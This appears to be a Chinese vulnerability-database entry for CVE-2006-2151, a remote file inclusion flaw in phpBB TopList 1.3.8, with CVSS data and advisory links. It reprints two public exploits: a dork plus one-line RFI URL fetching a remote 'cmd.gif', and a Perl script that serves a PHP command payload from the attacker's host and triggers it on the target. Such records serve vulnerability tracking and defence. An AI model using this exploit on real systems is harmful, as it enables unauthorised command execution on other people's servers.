CVE-2006-2151
CVSS7.5
发布时间 :2006-05-03 06:02:00
修订时间 :2011-03-07 21:35:26
NMCOE    

[原文]PHP remote file inclusion vulnerability in toplist.php in phpBB TopList 1.3.8 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via the phpbb_root_path parameter.


[CNNVD]phpBB TopList toplist.php PHP远程文件包含漏洞(CNNVD-200605-053)

        phpBB TopList 1.3.8及之前版本的toplist.php 存在PHP远程文件包含漏洞。当启用 register_globals 时,远程攻击者可以借助 phpbb_root_path 参数包含任意文件。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2151
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2151
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-053
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1601
(UNKNOWN)  VUPEN  ADV-2006-1601
http://secunia.com/advisories/19884
(VENDOR_ADVISORY)  SECUNIA  19884
http://milw0rm.com/exploits/1724
(UNKNOWN)  MILW0RM  1724
http://xforce.iss.net/xforce/xfdb/26172
(UNKNOWN)  XF  toplist-toplist-list-file-include(26172)
http://www.osvdb.org/25260
(UNKNOWN)  OSVDB  25260

- 漏洞信息

phpBB TopList toplist.php PHP远程文件包含漏洞
高危 未知
2006-05-03 00:00:00 2006-05-03 00:00:00
远程  
        phpBB TopList 1.3.8及之前版本的toplist.php 存在PHP远程文件包含漏洞。当启用 register_globals 时,远程攻击者可以借助 phpbb_root_path 参数包含任意文件。

- 公告与补丁

        

- 漏洞信息 (1722)

TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability (EDBID:1722)
php webapps
2006-04-27 Verified
0 [Oo]
N/A [点击下载]
Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-27]
		

- 漏洞信息 (1724)

TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit (EDBID:1724)
php webapps
2006-04-28 Verified
0 FOX_MULDER
N/A [点击下载]
# TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
# Based on http://milw0rm.com/exploits/1722
# Bug found by : [Oo]
#
# No more uploading php shells !!! 
# This is my way of php include exploitation !!!
# Learn to play with sockets !!!
# FOX_MULDER (fox_mulder@abv.bg)

#!/usr/bin/perl
  use LWP 5.64;
  use IO::Socket;
  use LWP::Simple;

(my $hostname, my $target, my $dir,my $command) = @ARGV;

if(@ARGV < 4) {
print "=======================================================================+\n";
print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg         |\n";
print "Usage: top.pl yourIP target /dir/ \"command\"                            |\n";
print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\"     |\n";
print "=======================================================================+\n";
exit;
}
print "[+]Creating listening socket . . .\n";
my $sock = new IO::Socket::INET (
                                  LocalHost => "$hostname",
                                  LocalPort => '9999',
                                  Proto => 'tcp',
                                  Listen => 1,
                                  Reuse => 1,
                                 );
 die "Could not create socket: $!\n" unless $sock;

        if (my $pid = fork){
        my $new_sock = $sock->accept();
                my $request = <$new_sock>;
                print $new_sock "HTTP/1.1 200 OK\n";
                print $new_sock "Content-Length: $content_length\n";
                print $new_sock "Content-Type: text/plain\n\n";
                print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n";
                close $new_sock;
                exit;
        }
print "[+]Injecting  command . . .\n";

my $browser = LWP::UserAgent->new;
   $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');

  my $url = "http://$target/$dir/toplist.php";
  my $response = $browser->post( $url,
    [
	'f'            => "toplist_top10",
        'phpbb_root_path' => "http://$hostname:9999/blah.php"
]
  );

  die "Received invalid response type", $response->content_type
   unless $response->content_type eq 'text/html';

        print $response->content;

# milw0rm.com [2006-04-28]
		

- 漏洞信息

25260
phpBB TopList toplist.php phpbb_root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

TopList contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to toplist.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-28 Unknow
2006-04-28 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站